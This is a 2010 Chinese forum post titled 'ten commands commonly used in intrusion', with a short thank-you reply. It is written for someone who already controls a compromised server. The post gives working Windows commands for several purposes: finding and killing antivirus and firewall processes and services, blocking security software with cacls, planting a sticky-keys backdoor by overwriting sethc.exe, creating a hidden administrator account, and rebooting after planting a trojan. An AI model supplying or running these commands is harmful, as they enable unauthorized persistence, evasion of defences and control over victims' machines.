入侵常用的10个命令
社区服务
火星文
银行
结婚
道具中心
勋章中心
管理操作原因
基本信息
管理团队
管理操作
在线会员
会员排行
版块排行
帖子排行
手机版
小说论坛
用户中心
搜索
银行
猴岛论坛
帖子
用户
版块
帖子
高级搜索
校园青春
动漫剧场
实物交易发布
签到统计
QQ微信技术
社区服务
综合游戏交流
纪念馆
娱乐时尚星座
跑跑卡丁车
关闭
选中
1
篇
全选
猴岛论坛
电脑百科
入侵常用的10个命令
发帖
回复
正序阅读
最近浏览的帖子
最近浏览的版块
« 返回列表
新帖
悬赏
任务
交易贴
自动发卡
拍卖
红包
际遇红包
1
个回复
[资源分享]
入侵常用的10个命令
楼层直达
不懂也不知道
ZxID:10586231
关注Ta
注册时间
2010-02-02
最后登录
2010-10-30
发帖
4317
在线
290小时
精华
27
DB
-167
威望
-1
保证金
0
桃子
0
鲜花
0
鸡蛋
0
访问TA的空间
加好友
用道具
发消息
加好友
他的帖子
对该用户使用道具
等级:
禁止发言
举报
只看楼主
使用道具
楼主
发表于: 2010-07-09
0
入侵常用的10个命令
当各位搞到一个shell,或者能远程执行命令之后,如何提权并保持肉鸡长期上线是一个难题。本人仅根据个人经验,旁敲侧击的谈几个常用命令,算是抛砖引玉,欢迎大家前来指导交流!
首先,提一下搞肉鸡,方法很多,1433、135、21,80、3389、4389,5900等端口都是常用的(有兴趣的可以下载专门的扫描器或者s扫描器)。
另外,说一下肉鸡的系统环境,一般都是服务器,所以杀毒软件、防火墙啥的相对来说还是比较牢固的,所以如何干扰并跳过这些保护也就是提权的关键。
最后,如何保持这个肉鸡长久上线,是目的所在,显然需要设置后门或者种植木马。
注:下文对喜欢3389直接远程登陆的用户不适用(不过善意提醒你,你留下了登陆等很多日志,呵呵);
常见命令, 如ipconfig、netstat等这儿不涉及,大家都会。
下面转入正文。
1.ver
作用:查看系统版本
实例:ver
说明:提权第一步就是查看这个是个人机器还是服务。
2.tasklist
作用:列出机器的所有进程
实例:tasklist
说明:用它你就可以知道肉鸡的杀毒软件、防火墙是啥。后面就好办了,给他中马的时候,首先本地测试,免杀,再种上去,防止中马不成功,或者留下查杀记录。(笨的办法可以直接停止杀毒软件,见后面命令。不过这样管理员就肯定知道自己中木马了,你长久控制肉鸡的目标也就要破碎了)。
3.taskkill
作用:杀制定名字或者pid的进程
实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389
说明:使用它可以结束防火墙进程啥的。因为它阻止你打开网络端口,或者以这台肉鸡为*****进行其他扫描、入侵啥的。当然,也可以结束杀毒软件等。
4.net start
作用:列出机器所有服务或者启动某个指定的服务
实例: net start 或者 net start w3svc(启动iis)
说明:通过它列出的所有服务可以看到服务器安装的杀毒软件,以及开放哪些服务。比如有瑞星服务,则你单独用taskkill是无法结束杀毒进程的,只能先停止服务。
比如有 Terminal Services则可以通过net u_ser(_去掉,因为华夏屏蔽)增加一个帐号,再3389登陆。
5.net stop
作用:停止指定的服务
实例: net stop net stop sharedaccess (停止windows防火墙)
说明:结合net start使用
6.cacls
作用:设置文件权限
实例: cacls c:\windows\mm.exe /P everyone:R 或者cacls c:\progra~1\rising\ravmond.exe /d:everyone
说明:可以用它来保护木马文件或者禁止某个程序(如杀毒软件)运行。这个在有时候,我们taskkill某个进程,发现马上又起来了比较有用。
设置为/d:everyone,任何人无法访问,自然没法再运行。(这一招也可以用来杀木马或者免疫:可参看
http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html
)
7.&
作用:连续执行多个命令
实例:del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
说明:上面是最简单的shift按多次后跳出资源管理器下后门。直接拷贝一次执行即可,不用批处理拉。
注:上面操作,你如果一步一步操作,早就被系统还原了,没法实现文件替换、设置后门。
8.echo y|
作用:当命令行执行碰到提示“是否确定(Y/N)?”的时候自动输入Y(因为你没法一边执行命令一边还可以选择y 或n)
实例:echo y>echo y>cacls c:\windows\mm.exe /P everyone:R;
说明:将上面shift按多次后门简化:echo y | copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & echo y | copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
(直接拷贝的时候会提示是否覆盖,这儿通过echo y解决)
9.net us_er/group(_去掉,因为华夏屏蔽)
作用:开帐号,并加入到组(一般是administrators组)
实例:net u_ser admin$ "123456" & net local_group administrators admin$ /add
说明:以上通过 &操作符又是一步到位。另外,通过这种方法建立的帐号,仅一次隐藏。如长期隐藏,可参考:
http://hi.baidu.com/it%5Fsecurity/blog/item/9bab86a0a60fac8d471064b5.html
10.shutdown
作用:重启或者关闭机器,或者取消关机
实例:shutdown -r -t 0(立即重启)
说明:该重启的时候重启吧,一般开服务或者中马之后。
以上命令有些2000下可能无法运行,xp,2003下肯定ok。
后续,我再总结一下如何通过命令行来中马。
主要是通过ftp或者http下载或传输文件(完全命令行方式),同时也呼吁大家多共享自己得经验,共同提高。
本帖de评分:
共
0
条评分
隐藏
本帖de打赏:
共
条打赏
隐藏
打赏
收藏
新鲜事
相关主题
电脑高手常用的5个按钮!
值得注意的10个windows7优化技巧
电脑高手常用的5个按钮
电脑高手常用的5个按钮
电脑高手常用的5个按钮!(太有用了!留下了!)
电脑高手常用的5个按钮!
回复
引用
鲜花[
0
]
鸡蛋[
0
]
-旺崽牛奶
ZxID:10476499
关注Ta
注册时间
2010-01-25
最后登录
2014-10-13
发帖
2347
在线
894小时
精华
0
DB
49
威望
55
保证金
0
桃子
0
鲜花
0
鸡蛋
0
访问TA的空间
加好友
用道具
发消息
加好友
他的帖子
对该用户使用道具
qq
等级:
中将
水贴年年有.....今年特别多..查水哥..B宝
举报
只看该作者
沙发
发表于: 2010-07-09
0
谢谢分享啊
本帖de评分:
共
0
条评分
隐藏
本帖de打赏:
共
条打赏
隐藏
QQ:872554370
回复
引用
新鲜事
鲜花[
0
]
鸡蛋[
0
]
« 返回列表
发帖
回复
关闭